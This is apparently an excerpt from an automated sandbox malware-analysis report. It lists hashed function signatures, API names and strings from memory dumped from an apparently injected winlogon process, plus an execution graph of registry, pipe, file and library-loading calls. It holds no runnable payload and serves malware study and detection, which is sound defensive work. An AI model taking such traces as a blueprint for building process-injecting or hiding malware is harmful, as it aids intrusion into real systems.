                                                • Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                • Instruction ID: b56bf77e3d38014fe6abc0fe981c7fccbbcf30d686bcff1290ba8758a7f2f1e9
                                                • Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                • Instruction Fuzzy Hash: 2511C135324FA096E7509B9AE858319B3A0F388FE6F208224EA5D877A4CF7CC944C740
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.2930567357.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_225dc640000_winlogon.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocFree
                                                • String ID: dialer
                                                • API String ID: 756756679-3528709123
                                                • Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                • Instruction ID: 043bd55ba01abd2451815a23672e2e217f532292a58b40aff087af92420aa0a0
                                                • Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                • Instruction Fuzzy Hash: 7031A469709F69E2EB25DF9EE94826977A0FB44F86F04C4309E4A07B54EF38C4A1C700
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.2930567357.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_225dc640000_winlogon.jbxd
                                                Similarity
                                                • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                • String ID:
                                                • API String ID: 517849248-0
                                                • Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                • Instruction ID: 258d30db1b86f1ee08310560d6057e4c708c8021364d2525115f470b83f8a513
                                                • Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                • Instruction Fuzzy Hash: 6C016D25314E51A6EB20DBA6A45C35973A1F788FC2F588835CE8A43754DF3DC985C700
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.2930567357.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_225dc640000_winlogon.jbxd
                                                Similarity
                                                • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                • String ID:
                                                • API String ID: 449555515-0
                                                • Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                • Instruction ID: a9f07ffff90aed63a477e6b5be0fa8bb21007e75bcb8cc0cc0795d7558385851
                                                • Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                • Instruction Fuzzy Hash: FC112D69625F64A6FB259FA9E40D716B7A0BB58F86F248834CD5947754EF3CC408C700
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.2930567357.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_225dc640000_winlogon.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                • String ID: csm$f
                                                • API String ID: 2395640692-629598281
                                                • Opcode ID: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
                                                • Instruction ID: d8b70030c570faa1b5d807255593d4be8cae63427be600f7cb8e87c94ce45865
                                                • Opcode Fuzzy Hash: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
                                                • Instruction Fuzzy Hash: 3A519F3A26DA20AAEB14DF99E44CB5A3799F344B99F50C560DE574778CDB35C842C700
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.2930567357.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_225dc640000_winlogon.jbxd
                                                Similarity
                                                • API ID: FinalHandleNamePathlstrlen
                                                • String ID: \\?\
                                                • API String ID: 2719912262-4282027825
                                                • Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                • Instruction ID: f112a6754a55382dbfdf9b1daadc51079be1241575beae1d4f281bfb9662e5ad
                                                • Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                • Instruction Fuzzy Hash: F6F04F66318E51A2EB208BA9F49D39A6760F744F8AF94C030DA4947A64DF3CC688CB00
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.2930567357.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_225dc640000_winlogon.jbxd
                                                Similarity
                                                • API ID: CombinePath
                                                • String ID: \\.\pipe\
                                                • API String ID: 3422762182-91387939
                                                • Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                • Instruction ID: 3f87963079133cfab528efc465c2264cd1018eb2f7383f1bd84a27779a78dc6e
                                                • Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                • Instruction Fuzzy Hash: 1AF0A72831CFA1A2EA008B9BB90D12A7220FB48FD2F18C531DE5B07B68CE3CC481C300
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.2930567357.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_225dc640000_winlogon.jbxd
                                                Similarity
                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 4061214504-1276376045
                                                • Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                • Instruction ID: d9b41130ff410577e9ff513638e825c8c1dfb14f427efc5cd3b7ef21c9094d7c
                                                • Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                • Instruction Fuzzy Hash: 18F01269339F54B1EF555FE8E88C3652360EB48F92F64A469A50B46565DF38C488C700
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.2930567357.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_225dc640000_winlogon.jbxd
                                                Similarity
                                                • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                • String ID:
                                                • API String ID: 2210144848-0
                                                • Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                • Instruction ID: ee9ba1a2d261dc6c65b4e2d43ba4bb6869639d99bddb9c3186d9302fb3dd522e
                                                • Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                • Instruction Fuzzy Hash: 4281C03AA34E30A9FB509FEDD8887AD27A1F784B96F648116DE0A5379ADB34C441C310
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.2930567357.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_225dc640000_winlogon.jbxd
                                                Similarity
                                                • API ID: CurrentThread
                                                • String ID:
                                                • API String ID: 2882836952-0
                                                • Opcode ID: 015e27c08688d47c0428e5d84959682217638f6f127bf3f2df59713f6161e560
                                                • Instruction ID: a4b7c35c2db1f1b914b8e8535d9430e2c3f20039a046fe468dad81212f6f9600
                                                • Opcode Fuzzy Hash: 015e27c08688d47c0428e5d84959682217638f6f127bf3f2df59713f6161e560
                                                • Instruction Fuzzy Hash: F161B83A51DFA4DAE760DB99E45831AB7A0F388B45F108155FA8E87BA8DB7CC540CF00
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.2930567357.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_225dc640000_winlogon.jbxd
                                                Similarity
                                                • API ID: _set_statfp
                                                • String ID:
                                                • API String ID: 1156100317-0
                                                • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction ID: 9c3a901dbb96c7a6d5f7416683512413e85e2737f534a2496eaaa02b9f688107
                                                • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction Fuzzy Hash: 6011822AA74E3162F6A815ECE55E36D11817B75376F39C624BAB7073D78B798C42C200
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.2929517041.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_225dc610000_winlogon.jbxd
                                                Similarity
                                                • API ID: _set_statfp
                                                • String ID:
                                                • API String ID: 1156100317-0
                                                • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction ID: e9220e0b73b1d97bc8ad9bb70746f7ec3aeed8aed2e016e4c1d481caacef4710
                                                • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction Fuzzy Hash: 4B11C82FA5CE3121F7A411EDE55E3E990526B58376F58C634FB7716BDA8A388C42C200
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.2929517041.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_225dc610000_winlogon.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                • String ID: csm$f
                                                • API String ID: 3242871069-629598281
                                                • Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                • Instruction ID: c4eb3d63776d4055a531065f3b4a1210afd8ee410b87a796abb7a39806a070ee
                                                • Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                • Instruction Fuzzy Hash: 9751CF3A713A60ABEF54CFADE848B193395F358B9BF52C224DA0647788EB34C841C744
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.2929517041.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_225dc610000_winlogon.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                • String ID: csm$f
                                                • API String ID: 3242871069-629598281
                                                • Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                • Instruction ID: 98add750b6747b53a7348f9af74011a36cd34dbe0a1de91b26c58f32e7b33695
                                                • Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                • Instruction Fuzzy Hash: D631C07A212A60AAEB54DF5AE84871977A4F748BDBF56C214AE4B07784CB38C940C704
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.2930567357.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_225dc640000_winlogon.jbxd
                                                Similarity
                                                • API ID: Heap$Process$Free
                                                • String ID:
                                                • API String ID: 3168794593-0
                                                • Opcode ID: 5f7cef85691391bfd1f64b5ed8b2db0144129af346a3a3b2b5e725a5d1a6a2a2
                                                • Instruction ID: e326b0d558216964c1bb90aba37888528c21a75a5d3d4e8eecd90829191c5857
                                                • Opcode Fuzzy Hash: 5f7cef85691391bfd1f64b5ed8b2db0144129af346a3a3b2b5e725a5d1a6a2a2
                                                • Instruction Fuzzy Hash: 9211827A528FA4A2E765DFBAA84821AB770F789F85F148429DB8A03755DF38C051C740
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.2930567357.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_225dc640000_winlogon.jbxd
                                                Similarity
                                                • API ID: FileType
                                                • String ID: \\.\pipe\
                                                • API String ID: 3081899298-91387939
                                                • Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                • Instruction ID: e84ec4e56ed1e90a05ef63eae199e49c7ac373d922cc0b8786abc0fb272ba263
                                                • Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                • Instruction Fuzzy Hash: 9871043A21CFA165EB25DFEE98483AE7791F749B86F648066DE4B43B89DE34C504C700
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.2930567357.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_225dc640000_winlogon.jbxd
                                                Similarity
                                                • API ID: FileType
                                                • String ID: \\.\pipe\
                                                • API String ID: 3081899298-91387939
                                                • Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                • Instruction ID: 82a189bbe50c5a58e74aff3149cadbbba18f33c2f75b78c150759b162fa20576
                                                • Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                • Instruction Fuzzy Hash: E051FC3A20CFA163EA769FEE955C36A7751F385B81F208165DD8B43B9ACE35C441CB40
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.2930567357.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_225dc640000_winlogon.jbxd
                                                Similarity
                                                • API ID: ErrorFileLastWrite
                                                • String ID: U
                                                • API String ID: 442123175-4171548499
                                                • Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                • Instruction ID: dbd3c59a83022a55f629b447afb55701cd426435ed0c6f26eff50a32d3407be4
                                                • Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                • Instruction Fuzzy Hash: 0241D776324F90A5EB20DF69E44839AB7A0F398B85F508025EE8E87798DF3CC541CB40
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.2930567357.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_225dc640000_winlogon.jbxd
                                                Similarity
                                                • API ID: Stringtry_get_function
                                                • String ID: LCMapStringEx
                                                • API String ID: 2588686239-3893581201
                                                • Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                • Instruction ID: 96e3d65a4d9add6818bea14478ca5d8bc85ea27d49f2560d141d73b6693779a1
                                                • Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                • Instruction Fuzzy Hash: EE111A3A608BD096D760CB5AF48429AB7A4F7C9B90F548126EE8E83B59DF38C450CB00
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.2930567357.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_225dc640000_winlogon.jbxd
                                                Similarity
                                                • API ID: ExceptionFileHeaderRaise
                                                • String ID: csm
                                                • API String ID: 2573137834-1018135373
                                                • Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                • Instruction ID: 354041a0a2ecc4c9e9bc09221ca2bb7f4da21dcaa4cc32c5419b9af12a7b4355
                                                • Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                • Instruction Fuzzy Hash: 1D114C36218F9092EB658F19F44425977A4F788F99F288260DF8D07B68DF38C552CB00
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.2930567357.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_225dc640000_winlogon.jbxd
                                                Similarity
                                                • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                • String ID: InitializeCriticalSectionEx
                                                • API String ID: 539475747-3084827643
                                                • Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                • Instruction ID: 753a0c4c8e75c7b377fb19d25a41dc167e0867bab3c2666fc635be3435da41e9
                                                • Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                • Instruction Fuzzy Hash: C8F02729728FB0B1E7059BC9F4082A53360EB88F82F68C161EA4A03B14CF38C894CB00
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.2930567357.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_225dc640000_winlogon.jbxd
                                                Similarity
                                                • API ID: Valuetry_get_function
                                                • String ID: FlsSetValue
                                                • API String ID: 738293619-3750699315
                                                • Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                • Instruction ID: 7188367852273573d0506cae3145d3ebffeb3ec7035bda74b2e084343ebc6817
                                                • Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                • Instruction Fuzzy Hash: DCE09269628E50B1EB054BDCF80C6A93362FB88F82F68C162DA0A06355CE38C855C700
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.2929517041.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_225dc610000_winlogon.jbxd
                                                Similarity
                                                • API ID: try_get_function
                                                • String ID: November$October
                                                • API String ID: 2742660187-1636048786
                                                • Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                • Instruction ID: ad5d257609b9ae283b254a7c1adf856348e354321dbb8be3287acd0e2c9a4b05
                                                • Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                • Instruction Fuzzy Hash: 18E09229306E51B2EE059BDDF44C2F8B321DB94747FAAD021991A06256CE38C986D340
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.2930567357.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_225dc640000_winlogon.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocFree
                                                • String ID:
                                                • API String ID: 756756679-0
                                                • Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                • Instruction ID: 033f51fa4fbd303eb701596ecc85ecdd0deee511843dda6ace5587389423011c
                                                • Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                • Instruction Fuzzy Hash: C021A77A618FA091EB218FADE40825AF7A0FB88F95F158120DE8D47B24EF78C543C700
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.2930567357.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_225dc640000_winlogon.jbxd
                                                Similarity
                                                • API ID: Heap$AllocProcess
                                                • String ID:
                                                • API String ID: 1617791916-0
                                                • Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                • Instruction ID: e260d4879ccdd16d2670f1e3a98160fb33c08bdd2834f05f7ee2a4984eaa195b
                                                • Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                • Instruction Fuzzy Hash: 07E09AB5A21A10D6E7288FBAD80834A36E1FB8CF02F58C434C90907360DF7D84DACB80

                                                Execution Graph

                                                Execution Coverage:1.1%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:0%
                                                Total number of Nodes:135
                                                Total number of Limit Nodes:11
                                                execution_graph 14042 202c0ae26f0 14044 202c0ae276f 14042->14044 14043 202c0ae2961 14044->14043 14045 202c0ae27d1 GetFileType 14044->14045 14046 202c0ae27df StrCpyW 14045->14046 14047 202c0ae27f5 14045->14047 14048 202c0ae2804 14046->14048 14058 202c0ae1ab8 GetFinalPathNameByHandleW 14047->14058 14052 202c0ae280e 14048->14052 14055 202c0ae28b3 14048->14055 14051 202c0ae3930 StrCmpNIW 14051->14055 14052->14043 14063 202c0ae3930 14052->14063 14066 202c0ae3200 StrCmpIW 14052->14066 14070 202c0ae1e4c 14052->14070 14055->14043 14055->14051 14056 202c0ae3200 4 API calls 14055->14056 14057 202c0ae1e4c 2 API calls 14055->14057 14056->14055 14057->14055 14059 202c0ae1b21 14058->14059 14060 202c0ae1ae2 StrCmpNIW 14058->14060 14059->14048 14060->14059 14061 202c0ae1afc lstrlenW 14060->14061 14061->14059 14062 202c0ae1b0e StrCpyW 14061->14062 14062->14059 14064 202c0ae393d StrCmpNIW 14063->14064 14065 202c0ae3952 14063->14065 14064->14065 14065->14052 14067 202c0ae3249 PathCombineW 14066->14067 14068 202c0ae3232 StrCpyW StrCatW 14066->14068 14069 202c0ae3252 14067->14069 14068->14069 14069->14052 14071 202c0ae1e6c 14070->14071 14072 202c0ae1e63 14070->14072 14071->14052 14074 202c0ae1554 14072->14074 14075 202c0ae15a4 14074->14075 14078 202c0ae156e 14074->14078 14075->14071 14076 202c0ae158d StrCmpW 14076->14078 14077 202c0ae1585 StrCmpIW 14077->14078 14078->14075 14078->14076 14078->14077 14079 202c0ae21cc 14081 202c0ae21fd 14079->14081 14080 202c0ae22e8 14081->14080 14082 202c0ae231d 14081->14082 14088 202c0ae2221 14081->14088 14083 202c0ae2391 14082->14083 14084 202c0ae2322 14082->14084 14083->14080 14087 202c0ae30b4 9 API calls 14083->14087 14097 202c0ae30b4 GetProcessHeap 14084->14097 14086 202c0ae2263 StrCmpNIW 14086->14088 14087->14080 14088->14080 14088->14086 14090 202c0ae1d60 14088->14090 14091 202c0ae1d8f GetProcessHeap 14090->14091 14092 202c0ae1e36 14090->14092 14094 202c0ae1db0 _set_errno_from_matherr 14091->14094 14092->14088 14093 202c0ae1e18 GetProcessHeap HeapFree 14093->14092 14094->14092 14094->14093 14095 202c0ae1554 2 API calls 14094->14095 14095->14093 14101 202c0ae30f0 _set_errno_from_matherr 14097->14101 14098 202c0ae31d1 GetProcessHeap HeapFree 14098->14080 14099 202c0ae31cc 14099->14098 14100 202c0ae315e StrCmpNIW 14100->14101 14101->14098 14101->14099 14101->14100 14102 202c0ae1d60 5 API calls 14101->14102 14102->14101 14103 202c0ae2cdc 14105 202c0ae2d4d 14103->14105 14104 202c0ae3090 14105->14104 14106 202c0ae2d79 GetModuleHandleA 14105->14106 14107 202c0ae2d8b try_get_function 14106->14107 14107->14104 14108 202c0ae2dc4 StrCmpNIW 14107->14108 14108->14104 14112 202c0ae2de9 14108->14112 14109 202c0ae1a14 6 API calls 14109->14112 14110 202c0ae2fb5 lstrlenW 14110->14112 14111 202c0ae2efb lstrlenW 14111->14112 14112->14104 14112->14109 14112->14110 14112->14111 14113 202c0ae3930 StrCmpNIW 14112->14113 14114 202c0ae1554 StrCmpIW StrCmpW 14112->14114 14113->14112 14114->14112 14115 202c0ae1c28 14120 202c0ae1650 GetProcessHeap 14115->14120 14117 202c0ae1c3e Sleep SleepEx 14118 202c0ae1c37 14117->14118 14118->14117 14119 202c0ae15c0 StrCmpIW StrCmpW 14118->14119 14119->14118 14121 202c0ae1670 _set_errno_from_matherr 14120->14121 14165 202c0ae1274 GetProcessHeap 14121->14165 14123 202c0ae1678 14124 202c0ae1274 2 API calls 14123->14124 14125 202c0ae1689 14124->14125 14126 202c0ae1274 2 API calls 14125->14126 14127 202c0ae1692 14126->14127 14128 202c0ae1274 2 API calls 14127->14128 14129 202c0ae169b 14128->14129 14130 202c0ae16b6 RegOpenKeyExW 14129->14130 14131 202c0ae18ce 14130->14131 14132 202c0ae16e8 RegOpenKeyExW 14130->14132 14131->14118 14133 202c0ae1711 14132->14133 14134 202c0ae1727 RegOpenKeyExW 14132->14134 14169 202c0ae12c8 RegQueryInfoKeyW 14133->14169 14136 202c0ae174b 14134->14136 14137 202c0ae1762 RegOpenKeyExW 14134->14137 14180 202c0ae104c RegQueryInfoKeyW 14136->14180 14140 202c0ae179d RegOpenKeyExW 14137->14140 14141 202c0ae1786 14137->14141 14144 202c0ae17c1 14140->14144 14145 202c0ae17d8 RegOpenKeyExW 14140->14145 14143 202c0ae12c8 13 API calls 14141->14143 14148 202c0ae1793 RegCloseKey 14143->14148 14149 202c0ae12c8 13 API calls 14144->14149 14146 202c0ae17fc 14145->14146 14147 202c0ae1813 RegOpenKeyExW 14145->14147 14150 202c0ae12c8 13 API calls 14146->14150 14151 202c0ae184e RegOpenKeyExW 14147->14151 14152 202c0ae1837 14147->14152 14148->14140 14153 202c0ae17ce RegCloseKey 14149->14153 14154 202c0ae1809 RegCloseKey 14150->14154 14156 202c0ae1889 RegOpenKeyExW 14151->14156 14157 202c0ae1872 14151->14157 14155 202c0ae104c 5 API calls 14152->14155 14153->14145 14154->14147 14158 202c0ae1844 RegCloseKey 14155->14158 14160 202c0ae18ad 14156->14160 14161 202c0ae18c4 RegCloseKey 14156->14161 14159 202c0ae104c 5 API calls 14157->14159 14158->14151 14162 202c0ae187f RegCloseKey 14159->14162 14163 202c0ae104c 5 API calls 14160->14163 14161->14131 14162->14156 14164 202c0ae18ba RegCloseKey 14163->14164 14164->14161 14186 202c0af3170 14165->14186 14167 202c0ae128f GetProcessHeap 14168 202c0ae12ba _set_errno_from_matherr 14167->14168 14168->14123 14170 202c0ae1499 RegCloseKey 14169->14170 14171 202c0ae1334 GetProcessHeap 14169->14171 14170->14134 14178 202c0ae134b _set_errno_from_matherr 14171->14178 14172 202c0ae135d RegEnumValueW 14172->14178 14173 202c0ae1485 GetProcessHeap HeapFree 14173->14170 14174 202c0ae1554 2 API calls 14174->14178 14175 202c0ae142f lstrlenW GetProcessHeap 14175->14178 14176 202c0ae13dd GetProcessHeap 14176->14178 14177 202c0ae1454 StrCpyW 14177->14178 14178->14172 14178->14173 14178->14174 14178->14175 14178->14176 14178->14177 14179 202c0ae1413 GetProcessHeap HeapFree 14178->14179 14179->14175 14181 202c0ae10b9 _set_errno_from_matherr 14180->14181 14182 202c0ae11b5 RegCloseKey 14180->14182 14181->14182 14183 202c0ae10c7 RegEnumValueW 14181->14183 14184 202c0ae1149 GetProcessHeap 14181->14184 14185 202c0ae117f GetProcessHeap HeapFree 14181->14185 14182->14137 14183->14181 14184->14181 14185->14181 14187 202c0af317b 14186->14187 14188 202c0ab2908 14190 202c0ab2936 14188->14190 14189 202c0ab2a2b LoadLibraryA 14189->14190 14190->14189 14191 202c0ab2aa7 14190->14191

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
